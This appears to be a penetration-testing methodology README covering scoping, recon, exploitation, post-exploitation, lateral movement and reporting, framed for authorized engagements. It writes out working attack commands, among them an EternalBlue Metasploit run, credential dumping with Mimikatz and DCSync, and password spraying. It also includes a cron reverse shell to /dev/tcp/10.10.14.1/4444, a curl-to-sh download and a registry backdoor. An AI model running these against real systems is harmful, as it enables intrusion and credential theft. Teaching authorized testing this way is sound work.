A structured, repeatable framework for conducting professional security assessments.
All activities must be performed only on systems you are explicitly authorized to test.
- Pre-Engagement
- Reconnaissance
- Scanning & Enumeration
- Vulnerability Analysis
- Exploitation
- Post-Exploitation
- Lateral Movement
- Reporting
- Remediation & Retesting
- Tools Reference
## Pre-Engagement

The foundation of any legitimate penetration test. Poor scoping is the most common cause of failed or disputed engagements.
- Define scope explicitly: IP ranges, domains, applications, physical locations
- Define out-of-scope assets just as clearly
- Establish authorized testing windows (maintenance windows, business hours, 24/7)
- Identify emergency contacts and escalation paths
- Agree on data handling procedures for sensitive data encountered during testing
- Get written authorization — no exceptions

### Testing Types

| Type | Description |
|---|---|
| Black Box | No prior knowledge; simulates external attacker |
| Grey Box | Partial knowledge (architecture diagrams, credentials) |
| White Box | Full knowledge; source code, infrastructure details |
| Red Team | Adversarial simulation; goal-based, not vulnerability-based |
| Purple Team | Collaborative; attacker and defender work together |

### Required Documentation

- Signed Statement of Work (SoW)
- Signed Rules of Engagement
- Scope confirmation in writing
- Emergency stop conditions and contacts
- Legal review if cross-border testing
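As an added illustration of the scoping rules above (example code, not part of the original methodology), here is a small Python scope gate that a tooling wrapper can call before any command is run against a host. The ranges, domains and testing window are constructed values; out-of-scope entries deliberately take precedence over in-scope ones, and the window check handles windows that wrap past midnight.

```python
"""Scope gate for a pentest toolkit: decide whether a target may be touched.

Added example, not part of the original methodology page. The scope values
below (ranges, domains, testing window) are constructed for illustration.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass, field
from datetime import datetime, time
from typing import Union

IPNet = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


@dataclass
class Scope:
    """Scope exactly as signed off in the SoW / Rules of Engagement."""
    in_networks: list[IPNet]
    in_domains: list[str]
    out_networks: list[IPNet] = field(default_factory=list)
    out_domains: list[str] = field(default_factory=list)
    window_start: time = time(0, 0)        # authorised testing window (client local time)
    window_end: time = time(23, 59, 59)


def _domain_matches(host: str, domain: str) -> bool:
    """True if host equals domain or is a subdomain of it (never a mere string suffix)."""
    host = host.lower().rstrip(".")
    domain = domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def in_window(scope: Scope, now: datetime) -> bool:
    """Window check that also handles windows wrapping past midnight (22:00 to 06:00)."""
    t = now.time()
    if scope.window_start <= scope.window_end:
        return scope.window_start <= t <= scope.window_end
    return t >= scope.window_start or t <= scope.window_end


def check_target(scope: Scope, target: str, now: datetime) -> tuple[bool, str]:
    """Return (allowed, reason). An out-of-scope entry always overrides an in-scope one."""
    if not in_window(scope, now):
        return False, f"outside authorised window {scope.window_start}-{scope.window_end}"
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        addr = None  # not an IP literal: treat as a hostname
    if addr is not None:
        if any(addr in net for net in scope.out_networks):
            return False, f"{target} is explicitly out of scope"
        if any(addr in net for net in scope.in_networks):
            return True, f"{target} is in scope"
        return False, f"{target} is not covered by any in-scope range"
    if any(_domain_matches(target, d) for d in scope.out_domains):
        return False, f"{target} is explicitly out of scope"
    if any(_domain_matches(target, d) for d in scope.in_domains):
        return True, f"{target} is in scope"
    return False, f"{target} is not covered by any in-scope domain"


# Constructed example scope (hypothetical engagement, not real data)
EXAMPLE_SCOPE = Scope(
    in_networks=[ipaddress.ip_network("10.10.10.0/24")],
    in_domains=["target.com"],
    out_networks=[ipaddress.ip_network("10.10.10.5/32")],  # e.g. a production database host
    out_domains=["legacy.target.com"],
    window_start=time(9, 0),
    window_end=time(17, 0),
)

if __name__ == "__main__":
    now = datetime(2024, 1, 15, 10, 30)  # constructed timestamp inside the window
    for target in ["10.10.10.10", "10.10.10.5", "10.10.20.1", "app.target.com", "db.legacy.target.com"]:
        allowed, reason = check_target(EXAMPLE_SCOPE, target, now)
        print(f"{'ALLOW' if allowed else 'DENY'}\t{reason}")
```

Wire `check_target` in front of every scanner invocation in a wrapper script and log its decision with a timestamp; the log doubles as evidence for the activity timeline in the report.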
## Reconnaissance

### Passive Reconnaissance

Gather information without directly interacting with target systems.

#### Domain & DNS

```bash
whois target.com
dig target.com ANY
dnsx -d target.com -a -aaaa -cname -mx -ns -txt
amass enum -passive -d target.com
subfinder -d target.com -silent
```

#### Certificate Transparency

```bash
# Search crt.sh for subdomains (%25 is the URL-encoded "%" wildcard; jq -r strips the quotes)
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u
```

#### Google Dorks

```
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com intitle:"index of"
"target.com" ext:conf OR ext:env OR ext:log
```
#### Email & Employee Enumeration

```bash
theHarvester -d target.com -b all
# hunter.io: API-based email pattern discovery
# linkedin-osint / CrossLinked: employee name enumeration
```

#### Code & Secret Leakage

```bash
# Search GitHub for exposed secrets
truffleHog --regex --entropy=False https://github.com/target/repo
gitleaks detect --source=/path/to/repo
# Also search: Pastebin, GreyNoise, Shodan, Censys
```

### Active Reconnaissance

Direct interaction with target infrastructure — ensure this is within scope.
#### DNS Brute-forcing

```bash
dnsx -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
gobuster dns -d target.com -w wordlist.txt
```

#### Shodan / Censys Queries

```
org:"Target Company Name"
hostname:target.com
ssl.cert.subject.cn:target.com
```
## Scanning & Enumeration

### Host Discovery

```bash
# Ping sweep
nmap -sn 10.10.10.0/24 -oG sweep.txt
# ARP scan (local network)
arp-scan --localnet
# Masscan for speed at scale
masscan -p1-65535 10.10.10.0/24 --rate=1000
```

### Port Scanning

```bash
# Full TCP scan on discovered hosts
nmap -sS -sV -sC -O -p- --min-rate 5000 -oA full_scan 10.10.10.10
# UDP scan (top ports)
nmap -sU --top-ports 200 -oA udp_scan 10.10.10.10
# Aggressive scan (only when noise is acceptable)
nmap -A -T4 -p- 10.10.10.10
```

### Service Enumeration

#### Web (HTTP/HTTPS)

```bash
# Directory & file brute-force
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,txt,bak
feroxbuster -u https://target.com --depth 3
# Technology fingerprinting
whatweb https://target.com
# wappalyzer (browser extension)
wafw00f https://target.com # WAF detection
# Screenshot at scale
eyewitness --web --prepend-https -f hosts.txt
gowitness scan --cidr 10.10.10.0/24
```

#### SMB

```bash
smbclient -L //10.10.10.10 -N
enum4linux-ng -A 10.10.10.10
nmap --script "smb-vuln*" -p 445 10.10.10.10   # quote the glob so the shell does not expand it
crackmapexec smb 10.10.10.0/24
```

#### LDAP / Active Directory

```bash
ldapsearch -x -H ldap://10.10.10.10 -b "DC=target,DC=com"
bloodhound-python -u user -p pass -d target.com -c All
enum4linux-ng -A -u user -p pass 10.10.10.10
```

#### Other Common Services

```bash
# FTP
nmap --script ftp-anon,ftp-bounce -p 21 10.10.10.10
# SSH
nmap --script ssh-auth-methods -p 22 10.10.10.10
# SNMP
snmpwalk -v 2c -c public 10.10.10.10
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.10.10.10
# SMTP
nmap --script smtp-enum-users -p 25 10.10.10.10
```

## Vulnerability Analysis

### Automated Scanning

```bash
# Network
# nessus / openvas (authenticated scans preferred)
nmap --script vuln 10.10.10.10
# Web
nikto -h https://target.com
nuclei -u https://target.com -t ~/nuclei-templates/
# SSL/TLS
testssl.sh https://target.com
sslyze --regular target.com:443
```

### Manual Analysis

Automated scanners miss logic flaws, chained vulnerabilities, and business-context issues. Always supplement with:
- Manual browsing with Burp Suite / ZAP proxy
- Source code review (if white box)
- Configuration review
- Authentication and session management testing
- Business logic testing (price manipulation, workflow bypass)
- API testing (Postman, custom scripts)
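Version-based vulnerability research only works on clean version data. The following added Python parser (not from the original page) turns nmap's greppable output, the `-oG` format used in the scanning section above, into a service inventory and a deduplicated list of product/version strings to look up against NVD or vendor advisories. `SAMPLE_GNMAP` is a constructed file in that format; the hosts and versions in it are made up.

```python
"""Parse nmap greppable output (-oG) into a service/version inventory.

Added example, not part of the original page. SAMPLE_GNMAP is a constructed
-oG file in nmap's documented format; host names and versions are made up.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One port entry: port/state/protocol/owner/service/rpcinfo/version/
# nmap replaces "/" inside field values with "|" (e.g. "ssl|https"), so the
# fields can be split on "/" safely.
PORT_RE = re.compile(r"(\d+)/([\w|]+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")
HOST_RE = re.compile(r"(\S+) \(([^)]*)\)")

# Constructed sample output (fields on a Host: line are tab-separated)
SAMPLE_GNMAP = (
    "# Nmap 7.94 scan initiated Mon Jan 15 10:31:02 2024 as: nmap -sS -sV -p- -oG full_scan.gnmap 10.10.10.0/24\n"
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.49 ((Unix))/, 445/open/tcp//microsoft-ds?///, "
    "3306/filtered/tcp//mysql///\tIgnored State: closed (65531)\n"
    "Host: 10.10.10.11 (web01.target.com)\tStatus: Up\n"
    "Host: 10.10.10.11 (web01.target.com)\tPorts: 443/open/tcp//ssl|https//nginx 1.18.0/\tIgnored State: closed (65534)\n"
    "# Nmap done at Mon Jan 15 10:45:11 2024 -- 256 IP addresses (2 hosts up) scanned in 849.12 seconds\n"
)


@dataclass(frozen=True)
class Service:
    ip: str
    hostname: str
    port: int
    proto: str
    state: str
    name: str
    version: str


def parse_gnmap(text: str) -> list[Service]:
    """Return every port entry found on 'Host: ... Ports: ...' lines."""
    services: list[Service] = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                            # comment lines (# Nmap ...)
        fields = {}
        for chunk in line.split("\t"):          # "Key: value" fields
            key, _, value = chunk.partition(": ")
            fields[key] = value
        if "Ports" not in fields:
            continue                            # "Status: Up" line carries no port data
        m = HOST_RE.match(fields["Host"])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        for port, state, proto, _owner, name, _rpc, version in PORT_RE.findall(fields["Ports"]):
            services.append(Service(ip, hostname, int(port), proto, state, name, version.strip()))
    return services


def open_services(services: list[Service]) -> list[Service]:
    return [s for s in services if s.state == "open"]


def version_strings(services: list[Service]) -> list[str]:
    """Distinct product/version strings from open ports, parenthetical extras dropped,
    ready to be cross-referenced against NVD / vendor advisories."""
    seen = set()
    for s in open_services(services):
        if not s.version:
            continue
        seen.add(re.sub(r"\s*\(.*$", "", s.version).strip())
    return sorted(seen)


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for s in open_services(inventory):
        print(f"{s.ip:<14} {s.port:>5}/{s.proto} {s.name:<14} {s.version}")
    print("Versions to research:", version_strings(inventory))
```

Filtered and closed ports are kept in the inventory (with their state) but excluded from the research list, so a filtered database port still shows up in the scope of the review without generating noise in the version lookups.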
### Vulnerability Research

```bash
# Search for known vulnerabilities in identified versions
searchsploit apache 2.4.49
# Cross-reference: NVD, ExploitDB, Vulners, Packet Storm
# Check vendor advisories and patch notes
```

## Exploitation

Document every action with timestamps. Do not exploit systems outside the agreed scope or window.
- Prioritize — exploit critical findings first; chain low-severity issues when possible
- Minimize impact — avoid DoS unless explicitly authorized; prefer PoC over destructive payloads
- Log everything — terminal logs, screenshots, timestamps
- Validate — confirm you have the access you think you have before proceeding
### Web Application Exploitation

#### OWASP Top 10 Focus Areas

| Vulnerability | Key Tools |
|---|---|
| Injection (SQLi, SSTI, LDAP) | sqlmap, manual Burp |
| Broken Authentication | Hydra, custom scripts |
| IDOR / Access Control | Manual testing, Burp Autorize |
| XSS | XSSHunter, Dalfox, manual |
| XXE | Manual Burp payloads |
| SSRF | Manual + SSRF-specific wordlists |
| Insecure Deserialization | ysoserial, PHPGGC |
| Misconfiguration | Nuclei templates, manual review |
```bash
# SQL Injection
sqlmap -u "https://target.com/page?id=1" --dbs --batch
# XSS Discovery
dalfox url "https://target.com/search?q=FUZZ"
# SSRF
# Intercept with Burp, test internal endpoints:
# http://169.254.169.254/latest/meta-data/ (AWS)
# http://metadata.google.internal/ (GCP)
```

### Network & Service Exploitation

```bash
# Metasploit Framework (module commands are entered at the msf prompt)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.1
run
# Password attacks
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
crackmapexec smb 10.10.10.0/24 -u users.txt -p passwords.txt --continue-on-success
# Pass-the-Hash
crackmapexec smb 10.10.10.10 -u Administrator -H <NTLM_HASH>
impacket-psexec Administrator@10.10.10.10 -hashes :<NTLM_HASH>
```

### Active Directory Attacks

```bash
# Password spraying (be mindful of lockout policies)
kerbrute passwordspray -d target.com --dc 10.10.10.10 users.txt 'Password123!'
# Kerberoasting
impacket-GetUserSPNs target.com/user:password -dc-ip 10.10.10.10 -request
# AS-REP Roasting
impacket-GetNPUsers target.com/ -usersfile users.txt -dc-ip 10.10.10.10
# Crack hashes
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt # Kerberoast
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt # AS-REP
```

## Post-Exploitation

### Local Enumeration

```bash
# Linux
id && whoami && hostname
cat /etc/passwd && cat /etc/shadow
find / -perm -4000 2>/dev/null # SUID binaries
find / -writable -type f 2>/dev/null # Writable files
sudo -l # Sudo privileges
crontab -l && cat /etc/crontab # Cron jobs
ss -tulnp # Open ports/services
env && cat ~/.bash_history
# Automated: LinPEAS / LinEnum
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

```powershell
# Windows
whoami /all
systeminfo
net users && net localgroup administrators
tasklist /svc
netstat -ano
# Automated: WinPEAS / PowerUp / JAWS
.\winPEASx64.exe
```

### Privilege Escalation Vectors

#### Linux
- SUID/SGID abuse → GTFOBins
- Sudo misconfigurations
- Writable cron jobs / PATH hijacking
- Kernel exploits (last resort)
- Capabilities (`getcap -r / 2>/dev/null`)
- NFS no_root_squash
#### Windows

- Token impersonation (SeImpersonatePrivilege → Potato attacks)
- Unquoted service paths
- Run key entries: `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- Weak service permissions
- AlwaysInstallElevated
- DLL hijacking
- Credential harvesting (SAM, LSASS)
### Credential Access

```bash
# Dump credentials (Windows)
# LSASS via Mimikatz (entered at the mimikatz prompt)
sekurlsa::logonpasswords
# SAM via impacket (remote)
impacket-secretsdump Administrator:password@10.10.10.10
```

### Persistence

Only establish persistence mechanisms explicitly authorized in the RoE.

```bash
# Linux: cron backdoor example (document before adding)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1'" >> /var/spool/cron/root
# Windows: registry run key
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\payload.exe"
# Always document and remove at end of engagement unless retaining for client demo
```

## Lateral Movement

### Pivoting & Tunneling

```bash
# SSH tunneling
ssh -L 8080:internal-host:80 user@pivot-host # Local forward
ssh -R 9090:localhost:9090 user@pivot-host # Remote forward
ssh -D 1080 user@pivot-host # SOCKS proxy
# Chisel (HTTP tunneling)
# On attacker:
./chisel server -p 8000 --reverse
# On pivot:
./chisel client 10.10.14.1:8000 R:socks
# Proxychains config
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn 172.16.0.0/24
```

### Active Directory Lateral Movement

```bash
# Pass-the-Ticket (Kerberos)
impacket-getTGT target.com/user:password
export KRB5CCNAME=user.ccache
impacket-psexec -k -no-pass target.com/user@DC01.target.com
# DCSync (dump all hashes from DC)
impacket-secretsdump -just-dc target.com/admin:password@10.10.10.10
# BloodHound path analysis
bloodhound-python -u user -p pass -d target.com -ns 10.10.10.10 -c All
# Upload to BloodHound, find shortest path to DA
```

| Attack | Condition |
|---|---|
| Pass-the-Hash | NTLM hash of privileged account |
| Pass-the-Ticket | Valid Kerberos TGT/TGS |
| Kerberoasting | Service accounts with SPNs set |
| AS-REP Roasting | Accounts with pre-auth disabled |
| ACL Abuse | WriteDACL / GenericAll / GenericWrite |
| GPO Abuse | Write access to Group Policy Object |
| DCSync | Replication rights on domain |
| Golden Ticket | krbtgt hash obtained |
| Silver Ticket | Service account hash obtained |
## Reporting

A finding with no report is a finding that doesn't get fixed. Reports are the primary deliverable.

### Report Structure

1. Executive Summary
   - Engagement overview (dates, scope, methodology)
   - High-level risk rating
   - Key findings summary (non-technical)
   - Recommendations overview
2. Scope & Methodology
   - Testing scope (in/out of scope)
   - Testing types performed
   - Tools used
   - Limitations and caveats
3. Findings
   - One section per finding (see the finding template below)
   - Ordered by severity: Critical → High → Medium → Low → Informational
4. Appendices
   - Raw scan output
   - Tool configurations
   - Credentials discovered (handled securely)
   - Testing timeline / activity log
### Finding Template

```markdown
## [FIND-001] Unauthenticated Remote Code Execution in Apache Struts
**Severity:** Critical
**CVSS Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
**Affected Asset:** app.target.com (10.10.10.10:443)
**CVE:** CVE-XXXX-XXXX

### Description
A brief, clear explanation of the vulnerability — what it is and why it exists.

### Impact
What an attacker can achieve. Be specific and business-relevant.
Example: An unauthenticated attacker can execute arbitrary OS commands as the `www-data`
user, leading to full server compromise and potential access to the internal network.

### Steps to Reproduce
1. Send a crafted POST request to `/struts/action`
2. ...
3. Observe command execution in the response

### Evidence
[Screenshot / redacted output]

### Remediation
Specific, actionable fix. Reference vendor advisory if applicable.
Example: Upgrade Apache Struts to version 2.5.33 or later. Apply vendor patch
OGNL-2023-0001. See: https://struts.apache.org/security/

### References
- https://nvd.nist.gov/vuln/detail/CVE-XXXX-XXXX
- https://vendor.advisory.url
```

### Severity Ratings

| Rating | CVSS Range | Description |
|---|---|---|
| Critical | 9.0–10.0 | Immediate exploitation risk, business-threatening impact |
| High | 7.0–8.9 | Significant risk, exploitable with low complexity |
| Medium | 4.0–6.9 | Exploitable with some complexity or limited impact |
| Low | 0.1–3.9 | Minimal risk, defense-in-depth improvement |
| Informational | N/A | Best practices, hardening recommendations |
## Remediation & Retesting

- Provide the client with a remediation window appropriate to severity (e.g., Critical: 24h–7 days, High: 30 days)
- Offer a retest for all Critical and High findings at no additional cost (negotiate this upfront)
- During retest, verify the fix is complete — not just the specific PoC, but the root cause
- Update the report with retest results and a closure date for each finding
- Issue a Letter of Attestation for findings that pass retest (useful for compliance)
## Tools Reference

### Reconnaissance

| Tool | Purpose |
|---|---|
| Amass | Subdomain enumeration |
| Subfinder | Passive subdomain discovery |
| theHarvester | Email, domain, OSINT gathering |
| Shodan / Censys | Internet-wide host discovery |
| DNSx | DNS resolution at scale |
| Recon-ng | Modular OSINT framework |

### Scanning & Enumeration

| Tool | Purpose |
|---|---|
| Nmap | Port scanning, service detection |
| Masscan | High-speed port scanning |
| Gobuster / Feroxbuster | Directory/file brute-forcing |
| Nuclei | Template-based vulnerability scanning |
| Nikto | Web server misconfiguration scanning |
| Enum4linux-ng | SMB/LDAP enumeration |

### Exploitation

| Tool | Purpose |
|---|---|
| Metasploit | Exploit framework |
| Burp Suite | Web application testing proxy |
| SQLmap | Automated SQL injection |
| Impacket | Windows/AD protocol toolset |
| CrackMapExec | SMB/AD Swiss army knife |
| Hydra | Online password brute-forcing |

### Post-Exploitation

| Tool | Purpose |
|---|---|
| Mimikatz | Credential extraction (Windows) |
| LinPEAS / WinPEAS | Privilege escalation enumeration |
| BloodHound | Active Directory attack path mapping |
| Chisel | TCP/UDP tunneling over HTTP |
| Ligolo-ng | Advanced tunneling / pivoting |

### Wordlists

| Resource | Use |
|---|---|
| SecLists | Comprehensive wordlist collection |
| RockYou | Password cracking |
| CeWL | Custom wordlist generation from target site |

## Legal & Ethical Notice

This methodology is intended for authorized security assessments only. Unauthorized access to computer systems is illegal in most jurisdictions and carries serious civil and criminal penalties.
Always:
- Obtain explicit written authorization before testing
- Stay within the agreed scope
- Handle client data with care — minimize collection, store securely, destroy after engagement
- Follow responsible disclosure if out-of-scope vulnerabilities are accidentally discovered
- Adhere to the code of ethics of any professional bodies you belong to (OSCP, CEH, CREST, etc.)

Maintained by @0xNullVector · Contributions welcome via PR